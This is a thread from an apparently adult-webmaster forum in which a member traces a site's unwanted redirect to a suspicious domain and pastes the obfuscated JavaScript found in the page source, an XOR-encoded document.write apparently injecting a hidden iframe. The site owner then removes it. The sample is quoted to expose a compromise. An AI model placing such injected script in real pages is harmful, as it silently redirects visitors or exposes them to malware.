Just wanted to say hi. Hit me up if you need anything associated with my cash program. Thanks! :reading:

P.S. Go Man U!

Hey Robert. Nice to see you here, welcome :)

Thanks bud, looks like a cool board.

nice sites you have

nice sites you have

Thanks I like yours too, I just signed up.

Every time I accsess getnaughtycah I get redirected to http://bitecnt.info/ld/ment/
Which cannot be found !

Welcome too !

Next time go to http://www.getnaughtycash.com/ then. :-)

Welcome to the mad house that is :bandb:
Go Reading............................just or you, see Pic, hehehehe:noway2:

That was quite a game the other day.

Welcome to the board - seeing as a certain someone stole my 'madhouse' saying...

Next time go to http://www.getnaughtycash.com/ then. :-)

Yeah I DID... I clicked your link, and I did it again...
I see your site for about 3 / 5 seconds and I get redirected to
http://www.google.co.uk/hws/sony/afe?hl=en&s=http://bitecnt.info/ld/ment/

Its trying to take nme to http://bitecnt.info/ld/ment/ but because its not online, it defaults to my 'google couldnt find this site... Try these...
ie The full url above...

Im not going mad. Somethings making your site redirect, and im sure its not at my end, cause it doesnt happen anywhere else...

I cant even see your page long enough to look at the source code and see if theres a redirect...

@ GetNaughty, where are the POTD's on your webmaster programme? they are mentioned but i cannot see them?

Yeah I DID... I clicked your link, and I did it again...
I see your site for about 3 / 5 seconds and I get redirected to
http://www.google.co.uk/hws/sony/afe?hl=en&s=http://bitecnt.info/ld/ment/

Its trying to take nme to http://bitecnt.info/ld/ment/ but because its not online, it defaults to my 'google couldnt find this site... Try these...
ie The full url above...

Im not going mad. Somethings making your site redirect, and im sure its not at my end, cause it doesnt happen anywhere else...

I cant even see your page long enough to look at the source code and see if theres a redirect...

You're good at picking up on Trojans and redirects on stuff. :)

Not getting this from GetNaughtyCash myself. You sure you don't have something on your PC.

The whois for the domain you are getting redirected to is of Russian decent, registered through Est Domains :(

Someone has something on their server/PC.

I'm not getting it either...

OK, Im NOT going mad!
http://www.getnaughtycash.com/
In the code of his page right in the middle and out of place with everything else i find the following:
</tr>
<tr> <script language="JavaScript">e = '0x00' + '6C';str1 = "%D7%8F%84%99%F3%9E%9F%94%87%88%D0%CD%99%84%9E%84%8 D%84%87%84%9F%94%D5%8B%84%8F%8F%88%81%CD%D1%D7%84% 89%9D%8C%80%88%F3%9E%9D%8E%D0%CD%8B%9F%9F%83%D5%C2 %C2%8D%84%9F%88%8E%81%9F%C1%84%81%89%82%C2%87%8F%C 2%80%88%81%9F%C2%CD%F3%9A%84%8F%9F%8B%D0%DC%F3%8B% 88%84%8A%8B%9F%D0%DC%D1%D7%C2%84%89%9D%8C%80%88%D1 %D7%C2%8F%84%99%D1";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

Now please tell me that isnt a iframe injection exploit?

If that is some totally innocent java thing then I apoligise, but perhaps those with more knoledge than I could offer a verdict?

You're good at picking up on Trojans and redirects on stuff. :)

Not getting this from GetNaughtyCash myself. You sure you don't have something on your PC.

The whois for the domain you are getting redirected to is of Russian decent, registered through Est Domains :(

Someone has something on their server/PC.

I DONT THINK its at my end... See above post for code I found on the page...
But at this point I step back, and let those with more knoledge than I step in :)
Running FULL Norton scan at the moment, but that code suggests to me I will be clean...

:)

Sorry to keep being the bearer of bad news... But its better to know than not know :)

Was just going to say, I am getting it now, not on every attempt though.

Just wanted to say hi. Hit me up if you need anything associated with my cash program. Thanks! :reading:

P.S. Go Man U!

Urmm Go Man U!

Oh and hi.

OK, Im NOT going mad!

no, you are not going mad. you already are, if you really click on links to sites you do not know and have scripts enabled?

@ GetNaughty, where are the POTD's on your webmaster programme? they are mentioned but i cannot see them?

They are on the promotools page, however we are putting a better potd system in place soon.
http://www.getnaughtycash.com/promotools.html


When you get the galleries for a girl, the potd is right on top along with gallery of the day as well.

VERY wierd! I'll fix it now. wow thanks for finding this. I am not getting redirected here.

Was just going to say, I am getting it now, not on every attempt though.

Hey ! I never said that it doesnt take a bit of practice did I :eyebrows:

I use Firefox, maybe thats why it didnt happen to me. What browser did it happen with?

no, you are not going mad. you already are, if you really click on links to sites you do not know and have scripts enabled?

Yes, but then again, how would I be able to perform my free service of alerting my fellow webmasters when thier servers have been compromised???

Gee... I just cant please anyone these days... LOL

Well, I deleted that code I need to head offline for a while. Thanks again for finding this and I apologize for it. Time to talk with my host.

I use Firefox, maybe thats why it didnt happen to me. What browser did it happen with?

IM just using the standard ie7 that came with vista.
All updates up to date, and a Google toolbar installed...

Same as 'most' surfers Id assume...
That's not meant derogatorily or anything... I just mean that Im using the browser that came installed with the Sony vaio :)

Gee... I just cant please anyone these days... LOL

not even self-abuse working out in a satisfactory manner? :takethat:

IM just using the standard ie7 that came with vista.
All updates up to date, and a Google toolbar installed...

Same as 'most' surfers Id assume...
That's not meant derogatorily or anything... I just mean that Im using the browser that came installed with the Sony vaio :)

obviously that's wrong. very wrong, bad in fact. you should install Firefox in an instant. doesn't matter this is the usual surfer setup, just don't do it. use Firefox. it's also better to view flicks with.

Well, I deleted that code I need to head offline for a while. Thanks again for finding this and I apologize for it. Time to talk with my host.

And I bet you a pint that it reappears as if by magic within a day or so...
All of its own accord. :)

From what i know of it, its actually the server itself that's compromised. its injecting itself, and will just re-infect.

I say that with some authority, as i had the same thing happen to a managed server I used to run back in 2004.
Every site on it, EVERY SITE had a code injected into the second page. Not the index.html, but whatever the next page was...

Anyway, i got onto the host, and they said... Oh you did it yourself etc.... Yeah right, of course... etc

No one but them had my password, but they tracked it down to an ip addy in Texas... They said i must have given a Texan my pass...!!! ???

On closer inspection of the logs, it was determined that this texas based log in was only on my server for about 30 seconds...

It would have taken an hour or more to access all the second pages by hand, (50+ sites) so needless to say, we agreed to disagree and i moved hosts that day lol...


Ahhh the good old days lol :)

obviously that's wrong. very wrong, bad in fact. you should install Firefox in an instant. doesn't matter this is the usual surfer setup, just don't do it. use Firefox. it's also better to view flicks with.

Shall I switch to a mac as well?

not even self-abuse working out in a satisfactory manner? :takethat:
No time for that... To busy ridding the web of trojans and exploits...
One site at a time :)

No time for that... To busy ridding the web of trojans and exploits...
One site at a time :)
And watching Big Brother of course...

Shall I switch to a mac as well?

you have to ask? :spank:

you have to ask? :spank:
Sorry blunt...

I mean -HF... :)

That was quite a game the other day.


Sunday MCFC 3 MAN U 1.

welcome to the board man. :)

Welcome :)

sup Robert !

welcome across the pond bro